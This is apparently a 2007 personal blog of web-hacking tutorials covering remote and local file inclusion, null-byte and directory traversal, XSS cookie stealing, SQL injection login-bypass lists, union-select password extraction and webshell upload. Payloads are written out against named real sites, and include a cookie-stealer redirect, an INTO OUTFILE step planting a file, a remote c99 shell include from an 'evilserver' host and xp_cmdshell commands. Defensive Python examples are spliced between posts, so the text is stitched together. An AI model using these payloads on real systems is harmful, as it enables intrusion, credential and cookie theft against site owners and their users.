The content is hashed, but you can try the brute force method using a program such as Brutus; I will publish a Perl code soon. I searched for passwords of FTP accounts for instance. It depends on your luck too.

URL scheme used : http://kleenrite.net/index.php?Tab=Renting&incFile=/etc/passwd

REMOTE ADMIN FILE DISCLOSURE

You try this more 'blind' in general, because we don't know for sure if it will work every time.
Remote Admin Password Disclosure: we try to access files from the inside.


URL scheme : http://www.site.com/files/uploaded/download.php?filename=download.php
I have posted a lot of examples on other sites where I have found some serious info like passwords and so on. Here it isn't such a big deal.

CROSS SITE SCRIPTING

It is in a state of research and some say it is the future. Well, I am going to present how you can find this vulnerability and how you can exploit it, but as I said at RFI, you have to study seriously if you want to really understand.
More exactly I'm going to refer to cookie stealing. For the test you proceed similarly as in SQL Injection. You look in forms and you try to inject simple scripts like: . The result is an alert window with the text "xss"; good, now you know that you can try a more complex script. We will build a cookie stealer and I will show you how you can look for cookies directly from a URL scheme.
After we test it like so: <script>alert('XSS')</script> we do the following:
window.location='http://site.com/carie.php?cookie='+document.cookie;

NULL BYTE-CGI EXPLOITATION

CGI (Common Gateway Interface) is an interface found on web servers that runs .cgi and .pl files. CGI scripts and folders are used for statistics, forms and database commands. The NULL byte is used in programming to mark the end of a string. The CGI page accesses other pages like so:
Index.cgi?pageid=2
Here page2.html is shown, but if we modify it a little like so:
Index.cgi?pageid.cgi%00
we have just added a NULL byte, and everything the script appends after it in the URL is cut off. Now we do the following scheme:
Index.cgi?pageid=/etc/passwd%00

Almost seems like LFI.


DIRECTORY TRANSVERSAL

Directory traversal is an HTTP exploit that allows the attacker to access folders inside the server and to execute commands from the server's root.

· Access Control Lists (ACLs)
· Root directory
These are two security mechanisms used on a server. In Access Control Lists the administrator puts limits on users and configures all the other functions. The root directory stops users from accessing files that contain sensitive data, like CMD on the Windows platform and the passwd file on Linux/UNIX.
http://site.com/show.asp?view=../../../../../Windows/system.ini The URL scheme makes a request to the show.asp page on the server and sends the view parameter with the value ../../../../../Windows/system.ini.
../ represents the directory above: we go one folder up.
Another scheme would be: http://site.com/scripts/..%5c../Windows/System32/
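The RFI, LFI, null-byte and traversal requests in this tutorial share a handful of tell-tale shapes, which makes them easy to flag in a web server access log. Added example, not from the tutorial: classify() tags a request URI after percent-decoding it until stable and folding %5c to /, scan() runs it over constructed sample requests (the tutorial's own URL forms are reused there), and safe_resolve() is the server-side counterpart that keeps a user-supplied path inside a base directory and rejects NUL bytes. Function names, tag names and the sample requests are assumptions.

```python
import os
import re
from urllib.parse import parse_qsl, unquote, urlsplit


def normalize(value: str) -> str:
    """Percent-decode until stable (catches double encoding such as %252e%252e)
    and treat a backslash like a forward slash (the ..%5c.. form shown above)."""
    prev = None
    while prev != value:
        prev, value = value, unquote(value)
    return value.replace("\\", "/")


def classify(request_uri: str) -> set:
    """Tag one request URI with the patterns described in this tutorial.
    Returns a subset of {'rfi', 'lfi', 'traversal', 'nullbyte'}."""
    tags = set()
    parts = urlsplit(request_uri)
    for _, raw in parse_qsl(parts.query, keep_blank_values=True):
        v = normalize(raw)
        if re.match(r"(https?|ftp)://", v, re.I):
            tags.add("rfi")          # a URL where a page name was expected
        if "../" in v:
            tags.add("traversal")    # climbing out of the intended directory
        if "\x00" in v:
            tags.add("nullbyte")     # %00 to cut off an appended suffix
        if re.search(r"/etc/(passwd|shadow)|boot\.ini|system\.ini|win\.ini", v, re.I):
            tags.add("lfi")          # well-known local files being requested
    if "../" in normalize(parts.path):
        tags.add("traversal")        # traversal in the path itself, not a parameter
    return tags


# Constructed access-log request lines (not real traffic), one per pattern.
SAMPLE_REQUESTS = [
    "/index.php?page=about",
    "/index.php?page=http://www.h4x3r.co.ke/evil.txt?",
    "/index.php?Tab=Renting&incFile=/etc/passwd",
    "/index.cgi?pageid=/etc/passwd%00",
    "/show.asp?view=../../../../../Windows/system.ini",
    "/scripts/..%5c../Windows/System32/",
]


def scan(requests: list) -> list:
    """Return [(uri, tags)] for every request that triggered at least one tag."""
    hits = []
    for uri in requests:
        tags = classify(uri)
        if tags:
            hits.append((uri, tags))
    return hits


def safe_resolve(base_dir: str, user_path: str) -> str:
    """Server-side counterpart: resolve a user-supplied path inside base_dir,
    refusing NUL bytes and any result that lands outside the base."""
    if "\x00" in user_path:
        raise ValueError("NUL byte in path")
    base = os.path.realpath(base_dir)
    candidate = os.path.join(base, normalize(user_path).lstrip("/"))
    target = os.path.realpath(candidate)
    if os.path.commonpath([base, target]) != base:
        raise ValueError("path escapes base directory: %r" % user_path)
    return target


if __name__ == "__main__":
    for uri, tags in scan(SAMPLE_REQUESTS):
        print(sorted(tags), uri)
    print(safe_resolve("/srv/www/pages", "about.html"))
```

Decoding until the value stops changing is what defeats the double-encoded variants; doing the same normalisation in safe_resolve before the realpath check means the detector and the fix agree on what a request actually asked for.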


Hope this helps all of you; it's an easy intro to Web Application Security.

See u soon,

/Chuks









Thursday, June 07, 2007

PHOTOS FOR THE CEH, FIVE MODULE TRAINING

Well, I had promised I would upload the videos for the conference held a little while ago, but I will have to postpone that to next week. Today I will upload some photos from the classes I trained on CEH. Well, I am not in any of the photos displayed, so don't look for me, hehehehe.......


1.One of the students tries to get a glimpse of what is going on when a shell pops up.


2.Some of the students who attended.

That all for now,

Cheers



/Chuks

Wednesday, June 06, 2007

CHUKSFIRE SQL INJECTION TOOL

I have been busy scripting a tool that can crawl servers looking for vulnerable pages which can be exploited using SQL injection. It's written in Perl and called chuksfire. I will be launching it soon; I will not name the day. I'm still working on the code, but it's at its BETA stage at the moment. I've been busy training, that's why it's not out yet. I will try to probe wananchi.co.ke; I will not display the vulnerable lines, though, but one thing you need to know: SQL injection can get your network compromised. This is how it works:

Starting chuksfire scan...

[*] Server: Apache/1.3.33 (Darwin) mod_jk/1.2.4 DAV/1.0.3 mod_ssl/2.8.24 OpenSSL/0.9.7i PHP/4.4 .1 mod_perl/1.26
[*] Checking robots.txt...
[*] Checking 1 page on www.wananchi.co.ke for SQL injection holes...
[*] Checking index.php...
[*] Checking for possible bugs...



I will try to see if I can add some CMS bugs to the code, so as to pick up known SQL injection vulnerabilities in well-used CMSs like Joomla, XOOPS and others.

Good reading.

/Chuks

HACKERS CODE

The Code

  1. Hackers share and are willing to teach their knowledge
  2. Hackers are skilled. Many are self-taught, or learn by interacting with other hackers.
  3. Hackers seek knowledge. This knowledge may come from unauthorized or unusual sources, and is often hidden.
  4. Hackers are tinkerers. They like to understand how things work, and want to make their own improvements or modifications.
  5. Hackers often disagree with authority, including parents, employers, social customs and laws. They often seek to circumvent authority they disagree with.
  6. Hackers disagree with each other. Different hackers have different values, and come from all backgrounds. This means that what one hacker is opposed to might be embraced by another.
  7. Hackers are persistent, and are willing to devote hours, days and years to pursuing their individual passions.
  8. This Code is not to prescribe how hackers act. Instead, it is to help us to recognize our own diversity and identity.
  9. Every hacker must make his or her own decisions about what is right or wrong, and some might do things they believe are illegal, amoral or anti-social to achieve higher goals.
  10. Hackers' motivations are their own, and there is no reason for all hackers to agree.
  11. Hackers have a shared identity, however, and many shared interests.
  12. By reading this Code, hackers can recognize themselves and each other, and understand better the group they are a part of. This will be beneficial to all hackers.

See u soon in Hack Dejavu, this Saturday for VIP at my security forum/mailist, the same spot, Igundas Place.

Good day.

/Chuks

Saturday, June 02, 2007

THE IT SECURITY CONFERENCE ARRANGED BY FUTURISTIC

Hi.

As most of you already know, we had the first IT Security Conference in Kenya in the middle of last month. Though we didn't cover as much as expected, I hope we did a good show, and people got introduced to I.T. security and learnt how small holes can be used to compromise a whole server or host.

I'm sure most of you were amazed when I used a tool like Metasploit and got hold of the desktop of someone who was logged in. Actually, hacking with Metasploit and seizing desktops is not so leet; there are more complicated hacking styles, where you install a good connect-back and no one will know you are connected or logged in. For that we use backdoors or rootkits. I demonstrated how to use Remote File Inclusion and how to find it in vulnerable sites, and that's where jaws dropped, since you could browse the system files of the victim. "Are we already in someone's server?" you would ask.

Anyway, hope to meet you for the upcoming CEH full course, which I will personally train, and we will go through the 22 modules.

Hope to see u soon, i will post up at my forum.

Good Read.

/Chuks

Tuesday, May 15, 2007

SQL COMMANDS, ALSO USED FOR COMPROMISE

Here is a list of SQL commands and what they do. These would be used in some injection methods and of course in legitimate SQL functions too.
On their own they won't exploit anything, but eventually you will find an exploit that needs these, and they are good to know, for injection or just to better understand how SQL works.

ABORT -- abort the current transaction
ALTER DATABASE -- change a database
ALTER GROUP -- add users to a group or remove users from a group
ALTER TABLE -- change the definition of a table
ALTER TRIGGER -- change the definition of a trigger
ALTER USER -- change a database user account
ANALYZE -- collect statistics about a database
BEGIN -- start a transaction block
CHECKPOINT -- force a transaction log checkpoint
CLOSE -- close a cursor
CLUSTER -- cluster a table according to an index
COMMENT -- define or change the comment of an object
COMMIT -- commit the current transaction
COPY -- copy data between files and tables
CREATE AGGREGATE -- define a new aggregate function
CREATE CAST -- define a user-defined cast
CREATE CONSTRAINT TRIGGER -- define a new constraint trigger
CREATE CONVERSION -- define a user-defined conversion
CREATE DATABASE -- create a new database
CREATE DOMAIN -- define a new domain
CREATE FUNCTION -- define a new function
CREATE GROUP -- define a new user group
CREATE INDEX -- define a new index
CREATE LANGUAGE -- define a new procedural language
CREATE OPERATOR -- define a new operator
CREATE OPERATOR CLASS -- define a new operator class for indexes
CREATE RULE -- define a new rewrite rule
CREATE SCHEMA -- define a new schema
CREATE SEQUENCE -- define a new sequence generator
CREATE TABLE -- define a new table
CREATE TABLE AS -- create a new table from the results of a query
CREATE TRIGGER -- define a new trigger
CREATE TYPE -- define a new data type
CREATE USER -- define a new database user account
CREATE VIEW -- define a new view
DEALLOCATE -- remove a prepared query
DECLARE -- define a cursor
DELETE -- delete rows of a table
DROP AGGREGATE -- remove a user-defined aggregate function
DROP CAST -- remove a user-defined cast
DROP CONVERSION -- remove a user-defined conversion
DROP DATABASE -- remove a database
DROP DOMAIN -- remove a user-defined domain
DROP FUNCTION -- remove a user-defined function
DROP GROUP -- remove a user group
DROP INDEX -- remove an index
DROP LANGUAGE -- remove a user-defined procedural language
DROP OPERATOR -- remove a user-defined operator
DROP OPERATOR CLASS -- remove a user-defined operator class
DROP RULE -- remove a rewrite rule
DROP SCHEMA -- remove a schema
DROP SEQUENCE -- remove a sequence
DROP TABLE -- remove a table
DROP TRIGGER -- remove a trigger
DROP TYPE -- remove a user-defined data type
DROP USER -- remove a database user account
DROP VIEW -- remove a view
END -- commit the current transaction
EXECUTE -- execute a prepared query
EXPLAIN -- show the execution plan of a statement
FETCH -- retrieve rows from a table using a cursor
GRANT -- define access privileges
INSERT -- create new rows in a table
LISTEN -- listen for a notification
LOAD -- load or reload a shared library file
LOCK -- explicitly lock a table
MOVE -- position a cursor on a specified row of a table
NOTIFY -- generate a notification
PREPARE -- create a prepared query
REINDEX -- rebuild corrupted indexes
RESET -- restore the value of a run-time parameter to a default value
REVOKE -- remove access privileges
ROLLBACK -- abort the current transaction
SELECT -- retrieve rows from a table or view
SELECT INTO -- create a new table from the results of a query
SET -- change a run-time parameter
SET CONSTRAINTS -- set the constraint mode of the current transaction
SET SESSION AUTHORIZATION -- set the session user identifier and the current user identifier of the current session
SET TRANSACTION -- set the characteristics of the current transaction
SHOW -- show the value of a run-time parameter
START TRANSACTION -- start a transaction block
TRUNCATE -- empty a table
UNLISTEN -- stop listening for a notification
UPDATE -- update rows of a table
VACUUM -- garbage-collect and optionally analyze a database


/Chuks

Thursday, May 10, 2007

ANSWERING THE QUESTIONS ON SQLINJECTION AND BUILDING IN AN RFI SCRIPT IN HOUSE

These come from the comments and reviews that were made, so I will try to explain them as best I can.

The best way to defend against it is to have port 3306 filtered..... (check that server, top government but one of the most insecure; mail me if u need the IP).

slax ~ # nmap -sS -P0 XXX.XXX.XXX.XXX

Starting Nmap 4.03 ( http://www.insecure.org/nmap/ ) at 2007-05-10 12:02 EAT

PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
143/tcp closed imap
443/tcp open https
631/tcp closed ipp
3306/tcp open mysql
10000/tcp closed snet-sensor-mgmt


.........and have the latest kernel patch on your box. As long as an RFI bug may be in yah site, or let's say your CMS, a knowledgeable hacker will still get thru, so even a strong password wouldn't be a big deal if he is browsing your server on port 80. The only thing that really helped last year against these kinds of attacks was to have yah PHP safe_mode ON (secure), but these days there are so many ways of bypassing it, lol!

This was well shown after the Month of PHP Bugs, January and February this year, after the release of a lot of POCs to the public by Hardened PHP and other communities.

To all, the best way to secure yah BOX is to know how an intruder will get thru, by doing all types of pentest attacks, whether black box or white box penetration testing.

Something else, before I go: SQL INJECTION can help an attacker build up an RFI attack on a server, by trying an injection where he is able to browse files, load_file('etc/password'), and creating his RFI by crafting an injection like:

www.site.com/vulnerablescripts.php?id=-1+union+select
+',1,2,3,4+from+mysql.user/**/into/**/outfile/**/'/home
/www/public/http/vul.php'/*

So we will have another file on the server named vul.php, which will have a straight RFI bug.

So remote include with a c99shell, or c100, r57 and other privately modded webshells.

www.site.com/vul.php?cmd=http://evilserver/c99.txt

Just a simple one, though there are more complex ones that need a lot of experience.

Tried to explain in Example.

/Chuks

Saturday, April 28, 2007

INJECTIONS, ATTACKING ASP LOGIN PAGES

Hi,

I have been looking into a lot of attacks, especially on shopadmin, on the login pages and other sites using different CMSs and running ASP.NET, and I have seen that most of the sites, especially those hosted by the ISPs, haven't just been hosted but archived, and the admins haven't even thought about how secure their login pages are. In this article, I will share with you some login attempts an attacker will use, try with, and gain administrative access.

Username: admin'--
username: ' or 1=1--

Username : admin
Password : admin' or a


Username : admin
Password : admin' or a=a --

user='' or ''=''
pass= '' or ''=''

- Login: hi' or 1=1--
- pass: hi' or 1=1--


Username: '; shutdown with nowait; --

Username: '; exec master..xp_xxx; --

Username: '; exec master..xp_cmdshell 'iisreset'; --


username = admin' or '6'='6




' or ''='

"'or''='"

'or"='

9,9,9

' or '

or 1=1?

or 1=1 --'

' or 'a'='a

admin'--

' or 0=0 --

" or 0=0 --

or 0=0 --

' or 0=0 #

" or 0=0 #

' or 'x'='x

') or ('x'='x

' or 1=1--

" or 1=1--

or 1=1--

' or a=a--

" or "a"="a

') or ('a'='a

") or ("a"="a

Chintan ' --

Chintan " --

' OR 1=1 ?

hi' or 'a'='a

hi" or "a"="a

hi" or 1=1 --

hi' or 1=1 --

hi' or 'a'='a

hi') or ('a'='a

hi") or ("a"="a

admin' or a=a --

admin" or "a"="a

admin" or 1=1 --

admin' or 1=1 --

admin' or 'a'='a

admin') or ('a'='a

admin") or ("a"="a

These are about enough, so test your login pages and drop me a mail in case u find these helpful.

Good weekend,

/Chuks

Wednesday, April 18, 2007

SQL INJECTIONS

This is a vulnerability a lot of hackers use when attacking webservers. By webservers I mean applications running on IIS or Apache, which are commonly used for hosting sites. This attack simply allows an attacker to alter backend SQL statements by manipulating the user input. To learn more about SQL injection, there are a lot of white papers on the net that can really help. See these pages:

http://www.acunetix.com/websitesecurity/sql-injection.htm


http://www.securiteam.com/securityreviews/5NP011FIUG.html

http://www.securiteam.com/securityreviews/5IP030K8AA.html

http://unixwiz.net/techtips/sql-injection.html

http://www.owasp.org/index.php/PHP_Top_5

And many others online

Let's take an example in PHP, aite?

Let's say our site is www.sitevulnerable.com/index.php
index.php is vulnerable to SQL injection. So how would we attack? www.sitevulnerable.com/index.php?id=-1

Maybe u are asking me why 1; you can use any number, 1010101, whatever.

The injection above may give an error, and actually these errors are the ones I will use to pick up passwords, tables etc.

So we go on by enumerating the tables

www.sitevulnerable.com/index.php?id=-1 union select 1/*

We are using /* to close the query so as to grep in the db.

So we will continue adding columns like this until we get an output that will help us.

www.sitevulnerable.com/index.php?id=-1 union select 1,2/*

Remember, with this we are just grepping the db for id 1, which probably is root.

www.sitevulnerable.com/index.php?id=-1 union select 4,3,2,1/*

and then i get an error like

3

1


We are still rolling........

So i will inject a crafted query like this


www.sitevulnerable.com/index.php?id=-1 union select 4,DATABASE(),2,USER()/*

And the error i get will be the user name in the DB.

root@localhost

So lets grep the password from the db

www.sitevulnerable.com/index.php?id=-1 union select host,host,2,password from mysql.user/*

And our error is

localhost

500372d40e775a87

Now that is an encrypted mysql hash, which can be bruteforced by using john the ripper.

Download from here


http://www.openwall.com/john/

So if i get the password, how will i log in to db and upload my files?

Simple, get a running shell, like c99shell, c100, r57 etc etc, they are all over the internet

A simple screenshot is done below.
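As an added example that is not the blog's own code, here is the pattern behind both the login bypasses listed in the "INJECTIONS, ATTACKING ASP LOGIN PAGES" post above and the id=-1 union select extraction walked through in this post, written in Python against an in-memory SQLite table, next to the parameterised form that defeats them. The users table, its columns and the sample credentials are constructed for the demo and are assumptions, not anything from the posts.

```python
import sqlite3

def make_db():
    """Constructed sample database: two users with demo-only plaintext passwords."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    con.executemany("INSERT INTO users VALUES (?, ?, ?)",
                    [(1, "admin", "s3cret"), (2, "chuks", "pass")])
    return con

def login_concat(con, username, password):
    """Vulnerable: the form fields become part of the SQL text, so a quote in
    the input ends the string literal and the rest is parsed as SQL."""
    sql = ("SELECT username FROM users WHERE username = '" + username
           + "' AND password = '" + password + "'")
    row = con.execute(sql).fetchone()
    return row[0] if row else None

def login_param(con, username, password):
    """Hardened: placeholders. The driver passes the values out of band, so
    quotes, 'or' and '--' in the input are just characters to compare."""
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    row = con.execute(sql, (username, password)).fetchone()
    return row[0] if row else None

def article_concat(con, id_text):
    """Vulnerable: mirrors index.php?id=-1 union select ... from the post."""
    sql = "SELECT id, username FROM users WHERE id = " + id_text
    return con.execute(sql).fetchall()

def article_param(con, id_text):
    """Hardened: the id must parse as an integer before it is bound, so a
    'union select' payload never reaches the database."""
    try:
        id_value = int(id_text)
    except ValueError:
        return []
    sql = "SELECT id, username FROM users WHERE id = ?"
    return con.execute(sql, (id_value,)).fetchall()

if __name__ == "__main__":
    db = make_db()
    print(login_concat(db, "' or 1=1--", "x"))   # admin: the page's bypass works
    print(login_param(db, "' or 1=1--", "x"))    # None: same input, rejected
    print(article_concat(db, "-1 union select id, password from users"))  # passwords leak
    print(article_param(db, "-1 union select id, password from users"))   # []
```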







Hope this helped, signing off,

/Chuks

Tuesday, April 17, 2007

EXPLAINING CONTENT MANAGEMENT SYSTEMS

A content management system is an application that is accessed with a web browser (Mozilla Firefox, Opera, Konqueror etc.) over a network like the Internet or through an intranet. We actually call them web applications, and that's where we start talking about web application security.

We use these web applications for webmail, online retail sales, online auctions, wikis, weblogs, discussion boards (forums) and a lot of others.

A Content Management System simplifies the work of the administrators of a site when it comes to things like editing processes, creating, translation, publishing, archiving and a lot more.

Errors and bugs are found and released every day, including hacked frameworks and new and zero-day exploits; people are made aware of them and patches are released. To learn more about web application security, you can check www.webappsec.org, a site I visit several times a day. Others are www.owasp.org, www.spidynamics.com, www.acunetix.com and www.cgisecurity.com.

Most of the Content Management Systems I know of are open source, so free for anybody who wants to have a website which really sings..........

/Chuks

Thursday, April 12, 2007

LOCAL FILE INCLUSION


Local file inclusion is when you view one of the remote system's local files through one of its web-based scripts, normally e.g. victimsite.com/vulnerablescript.php?script=../../../../../../../etc/passwd? which, on a Unix/Linux system, will bring up the passwd file.

It's normally found in web applications whose input isn't sanitised properly. http://www.victim.com/vulnerablescript.php=2

Now this is like a GET parameter request for 2 on the above URL. LFI works with the following:

- Null bytes: %00
- Directory traversal: /../

Lets assume the vulnerable script looks as this;

<?php
$file = $_GET["file"]; // GET parameter, taken straight from the request
include("./vuln/$file.php"); // include the GET parameter with a folder prefix; no validation, so this is the LFI
?>



As we all know, the GET parameter is passed to the include function, which then loads the file, linking up to the full path: /home/www/anotherfile/application/vulnerablescript.php

Also, as far as PHP is concerned, it has a way of allowing upload of files to the box's template folder, which will turn an LFI into an RFI. RFI is short for Remote File Inclusion. This will happen if allow_url_fopen is enabled, which, due to these vulnerabilities, will be disabled in PHP 6. You can read more about uploading in PHP here: http://au.php.net/manual/en/features.file-upload

So to check if our exploit works, we load up the vulnerable script in the URL and feed in an LFI. Check this out.....

www.victimsite.com/vulnerablescript.php=../vulnerablescript.php

......and if it reloads, the site is vulnerable to LFI.

What will happen in the background is something like this

/home/www/anotherfile/application/vuln/../vulnerablescript.php

Now this is a simple directory traversal.

Null bytes come into play when the script appends .php to the file name: everything after %00 is ignored, so if u do vulnerablescript.php%00, the appended .php is dropped.

Remember, most of our sites have so many security holes u would be amazed, especially if the box is on the same LAN as the company or the institution. Another way of acting gone in 60 seconds, huh!
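Added example, not code from the blog: the same include resolved defensively, written in Python. It blocks the two tricks the post names, directory traversal (/../) and the %00 null byte, by decoding the parameter, refusing null bytes, normalising the path and requiring it to stay under the include directory, with a stricter allow-list variant beside it. BASE_DIR reuses the path given in the post; the page names in the allow-list are assumptions, and nothing is read from disk.

```python
import posixpath
from urllib.parse import unquote

# include directory from the post's example path (nothing is read from it here)
BASE_DIR = "/home/www/anotherfile/application/vuln"

def resolve_include(base_dir, raw_param):
    """Return the absolute file to include, or None if the request is unsafe."""
    name = unquote(raw_param)            # %00 -> "\x00", %2e%2e -> ".."
    if not name or "\x00" in name:
        return None                      # a null byte would truncate the path in old PHP
    candidate = posixpath.normpath(posixpath.join(base_dir, name + ".php"))
    # normpath has already collapsed any /../ segments; an escaped path now
    # shares a shorter prefix with base_dir than base_dir itself
    if posixpath.commonpath([base_dir, candidate]) != base_dir:
        return None                      # traversal or absolute path left the directory
    return candidate

# assumed page names for the allow-list variant
ALLOWED_PAGES = ("index", "about", "contact")

def include_from_allowlist(raw_param, pages=ALLOWED_PAGES):
    """Stricter alternative: user text selects from a fixed set of page names
    and never becomes part of the filesystem path at all."""
    name = unquote(raw_param)
    return posixpath.join(BASE_DIR, name + ".php") if name in pages else None

if __name__ == "__main__":
    print(resolve_include(BASE_DIR, "index"))                 # .../vuln/index.php
    print(resolve_include(BASE_DIR, "../vulnerablescript"))   # None (traversal)
    print(resolve_include(BASE_DIR, "../../etc/passwd%00"))   # None (null byte)
    print(include_from_allowlist("../vulnerablescript"))      # None (not a page)
```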

The screenshot below shows an LFI.


Will be writing more soon on websecurity.

/Chuks

Wednesday, April 11, 2007

IT SECURITY IN MY COUNTRY

Hi.

In my country, computer security is not much of an issue as far as administration is concerned. You will find how simple it is to break in and how vulnerable big companies' and government institutions' networks are. So I wish to use this blog to address I.T. security and web security as a whole: how deep the rabbit hole goes, and a little on exploits and vulnerabilities.